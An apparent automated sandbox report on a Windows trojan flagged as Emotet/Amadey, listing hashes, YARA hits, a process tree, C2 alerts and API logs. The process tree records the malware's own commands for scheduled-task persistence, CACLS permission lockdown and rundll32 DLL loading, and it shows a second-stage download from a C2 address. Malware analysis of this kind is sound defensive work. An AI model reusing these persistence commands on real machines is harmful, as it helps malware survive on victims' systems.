Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	May 26, 2023, 9:13 a.m.	May 26, 2023, 9:31 a.m.

Size	768.0KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`180bd09c76ac2ffe9d1666a2e67014ef`
SHA256	`be2a733f7aee3035d1cd74932a15190ad02a7dd886cf023c7cae4fef3e1c7f24`
CRC32	`785B5638`
ssdeep	`12288:TMrBy90QzVkGlNK2z0BBwhaltD1C8cXQw2G/2hbKp644yZhENF/an0kBkgnMLtI8:2yXVnXGAat8vOGOEx0Fi0kegML1+C`
PDB Path	wextract.pdb
Yara	UPX_Zero - UPX packed file Win32_Trojan_Gen_1_0904B0_Zero - Win32 Trojan Emotet Malicious_Library_Zero - Malicious_Library CAB_file_format - CAB archive file PE_Header_Zero - PE File Signature IsPE32 - (no description) Win32_Trojan_Emotet_RL_Gen_Zero - Win32 Trojan Emotet

fotocr05.exe "C:\Users\test22\AppData\Local\Temp\fotocr05.exe"
2060
- y6317478.exe C:\Users\test22\AppData\Local\Temp\IXP000.TMP\y6317478.exe
  2148
  - y0651307.exe C:\Users\test22\AppData\Local\Temp\IXP001.TMP\y0651307.exe
    2192
    - k9845936.exe C:\Users\test22\AppData\Local\Temp\IXP002.TMP\k9845936.exe
      2260
    - l5196213.exe C:\Users\test22\AppData\Local\Temp\IXP002.TMP\l5196213.exe
      2328
  - m8217450.exe C:\Users\test22\AppData\Local\Temp\IXP001.TMP\m8217450.exe
    2868
    - metado.exe "C:\Users\test22\AppData\Local\Temp\a9e2a16078\metado.exe"
      2980
      - schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN metado.exe /TR "C:\Users\test22\AppData\Local\Temp\a9e2a16078\metado.exe" /F
        2100
      - cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "metado.exe" /P "test22:N"&&CACLS "metado.exe" /P "test22:R" /E&&echo Y|CACLS "..\a9e2a16078" /P "test22:N"&&CACLS "..\a9e2a16078" /P "test22:R" /E&&Exit
        2212
        
        cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        2296
        
        cacls.exe CACLS "metado.exe" /P "test22:N"
        2236
        
        cacls.exe CACLS "metado.exe" /P "test22:R" /E
        2080
        
        cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        2552
        
        cacls.exe CACLS "..\a9e2a16078" /P "test22:N"
        2776
        
        cacls.exe CACLS "..\a9e2a16078" /P "test22:R" /E
        2452
      - rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
        2376
- n9782940.exe C:\Users\test22\AppData\Local\Temp\IXP000.TMP\n9782940.exe
  3028
explorer.exe C:\Windows\Explorer.EXE
1236

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch
77.91.68.62	Active	Moloch
83.97.73.122	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49180 -> 77.91.68.62:80	2027700	ET MALWARE Amadey CnC Check-In	Malware Command and Control Activity Detected
TCP 192.168.56.103:49180 -> 77.91.68.62:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.103:49180 -> 77.91.68.62:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 77.91.68.62:80 -> 192.168.56.103:49180	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 77.91.68.62:80 -> 192.168.56.103:49180	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 77.91.68.62:80 -> 192.168.56.103:49180	2015744	ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)	Misc activity

Suricata TLS

No Suricata TLS

Queries for the computername (13 events)

Time & API	Arguments	Status	Return
GetComputerNameW May 26, 2023, 9:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 26, 2023, 9:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 26, 2023, 9:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 26, 2023, 9:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 26, 2023, 9:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 26, 2023, 9:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 26, 2023, 9:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 26, 2023, 9:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 26, 2023, 9:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 26, 2023, 9:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 26, 2023, 9:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 26, 2023, 9:13 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 26, 2023, 9:13 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (3 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 26, 2023, 9:13 a.m.			0	0
IsDebuggerPresent May 26, 2023, 9:13 a.m.			0	0
IsDebuggerPresent May 26, 2023, 9:30 a.m.			0	0

Command line console output was observed (50 out of 79 events)

Time & API	Arguments	Status	Return
WriteConsoleW May 26, 2023, 9:13 a.m.	buffer: SUCCESS: The scheduled task "metado.exe" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleA May 26, 2023, 9:13 a.m.	buffer: A console_handle: 0x00000007	1	1
WriteConsoleA May 26, 2023, 9:13 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA May 26, 2023, 9:13 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA May 26, 2023, 9:13 a.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleA May 26, 2023, 9:13 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA May 26, 2023, 9:13 a.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA May 26, 2023, 9:13 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA May 26, 2023, 9:13 a.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA May 26, 2023, 9:13 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA May 26, 2023, 9:13 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA May 26, 2023, 9:13 a.m.	buffer: Y console_handle: 0x00000007	1	1
WriteConsoleA May 26, 2023, 9:13 a.m.	buffer: N console_handle: 0x00000007	1	1
WriteConsoleA May 26, 2023, 9:13 a.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA May 26, 2023, 9:13 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA May 26, 2023, 9:13 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA May 26, 2023, 9:13 a.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA May 26, 2023, 9:13 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA May 26, 2023, 9:13 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA May 26, 2023, 9:13 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA May 26, 2023, 9:13 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA May 26, 2023, 9:13 a.m.	buffer: d console_handle: 0x00000007	1	1
WriteConsoleA May 26, 2023, 9:13 a.m.	buffer: f console_handle: 0x00000007	1	1
WriteConsoleA May 26, 2023, 9:13 a.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA May 26, 2023, 9:13 a.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA May 26, 2023, 9:13 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleW May 26, 2023, 9:13 a.m.	buffer: C:\Users\test22\AppData\Local\Temp\a9e2a16078\metado.exe console_handle: 0x00000007	1	1
WriteConsoleA May 26, 2023, 9:13 a.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA May 26, 2023, 9:13 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA May 26, 2023, 9:13 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA May 26, 2023, 9:13 a.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA May 26, 2023, 9:13 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA May 26, 2023, 9:13 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA May 26, 2023, 9:13 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA May 26, 2023, 9:13 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA May 26, 2023, 9:13 a.m.	buffer: d console_handle: 0x00000007	1	1
WriteConsoleA May 26, 2023, 9:13 a.m.	buffer: f console_handle: 0x00000007	1	1
WriteConsoleA May 26, 2023, 9:13 a.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA May 26, 2023, 9:13 a.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA May 26, 2023, 9:13 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleW May 26, 2023, 9:13 a.m.	buffer: C:\Users\test22\AppData\Local\Temp\a9e2a16078\metado.exe console_handle: 0x00000007	1	1
WriteConsoleA May 26, 2023, 9:13 a.m.	buffer: A console_handle: 0x00000007	1	1
WriteConsoleA May 26, 2023, 9:13 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA May 26, 2023, 9:13 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA May 26, 2023, 9:13 a.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleA May 26, 2023, 9:13 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA May 26, 2023, 9:13 a.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA May 26, 2023, 9:13 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA May 26, 2023, 9:13 a.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA May 26, 2023, 9:13 a.m.	buffer: r console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (17 events)

Time & API	Arguments	Status	Return
CryptExportKey May 26, 2023, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00816fd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00816fd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00816fd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00816fd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00816f58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00816f58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00816f58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00816f58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00816f58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00816f58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00816f58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00817018 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00817018 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x008171d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00817918 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00817918 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 9:13 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x008177d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

This executable has a PDB path (1 event)

pdb_path

wextract.pdb

Tries to locate where the browsers are installed (3 events)

file	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file	C:\Program Files\Mozilla Firefox\firefox.exe
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 26, 2023, 9:13 a.m.		1	1	0

The file contains an unknown PE resource name possibly indicative of a packer (1 event)

resource name

AVI

One or more processes crashed (14 events)

Time & API	Arguments	Status
__exception__ May 26, 2023, 9:13 a.m.	stacktrace: 0xb77464 0xb77386 0xb72505 0xb720de 0xb705c8 0xb70094 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xb77558 registers.esp: 3665640 registers.edi: 3665692 registers.eax: 0 registers.ebp: 3665704 registers.edx: 8333608 registers.ebx: 3666596 registers.esi: 40199228 registers.ecx: 0	1
__exception__ May 26, 2023, 9:13 a.m.	stacktrace: 0x53c5ee0 0x53c20e3 0x53c1b6f 0x53c1a6d 0x53c06ca 0xb7f9ce 0xb77cbf 0xb725cd 0xb720de 0xb705c8 0xb70094 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x53c5f23 registers.esp: 3664696 registers.edi: 3664984 registers.eax: 0 registers.ebp: 3664704 registers.edx: 0 registers.ebx: 3666596 registers.esi: 41126092 registers.ecx: 42251972	1
__exception__ May 26, 2023, 9:13 a.m.	stacktrace: 0x53c5ee0 0x53c20e3 0x53c1b6f 0x53c1a85 0x53c06ca 0xb7f9ce 0xb77cbf 0xb725cd 0xb720de 0xb705c8 0xb70094 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x53c5f23 registers.esp: 3664696 registers.edi: 3664984 registers.eax: 0 registers.ebp: 3664704 registers.edx: 0 registers.ebx: 3666596 registers.esi: 41126092 registers.ecx: 43556600	1
__exception__ May 26, 2023, 9:13 a.m.	stacktrace: 0x53c5ee0 0x53c20e3 0x53c1b6f 0x53c1a85 0x53c06ca 0xb7f9ce 0xb77cbf 0xb725cd 0xb720de 0xb705c8 0xb70094 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x53c5f23 registers.esp: 3664696 registers.edi: 3664984 registers.eax: 0 registers.ebp: 3664704 registers.edx: 0 registers.ebx: 3666596 registers.esi: 41126092 registers.ecx: 41031360	1
__exception__ May 26, 2023, 9:13 a.m.	stacktrace: 0x53c5ee0 0x53c674f 0x53c6210 0x53c1a6d 0x53c0968 0xb7f9ce 0xb77cbf 0xb725cd 0xb720de 0xb705c8 0xb70094 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x53c5f23 registers.esp: 3664700 registers.edi: 3665012 registers.eax: 0 registers.ebp: 3664708 registers.edx: 0 registers.ebx: 3666596 registers.esi: 39928412 registers.ecx: 40459448	1
__exception__ May 26, 2023, 9:13 a.m.	stacktrace: 0x53c5ee0 0x53c674f 0x53c6210 0x53c1a85 0x53c0968 0xb7f9ce 0xb77cbf 0xb725cd 0xb720de 0xb705c8 0xb70094 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x53c5f23 registers.esp: 3664700 registers.edi: 3665012 registers.eax: 0 registers.ebp: 3664708 registers.edx: 0 registers.ebx: 3666596 registers.esi: 39910292 registers.ecx: 41805360	1
__exception__ May 26, 2023, 9:13 a.m.	stacktrace: 0x53c5ee0 0x53c674f 0x53c6210 0x53c1a85 0x53c0968 0xb7f9ce 0xb77cbf 0xb725cd 0xb720de 0xb705c8 0xb70094 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x53c5f23 registers.esp: 3664700 registers.edi: 3665012 registers.eax: 0 registers.ebp: 3664708 registers.edx: 0 registers.ebx: 3666596 registers.esi: 39910292 registers.ecx: 43151272	1
__exception__ May 26, 2023, 9:13 a.m.	stacktrace: 0x53c5ee0 0x53c6f03 0x53c69e8 0x53c1a6d 0x53c0a67 0xb7f9ce 0xb77cbf 0xb725cd 0xb720de 0xb705c8 0xb70094 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 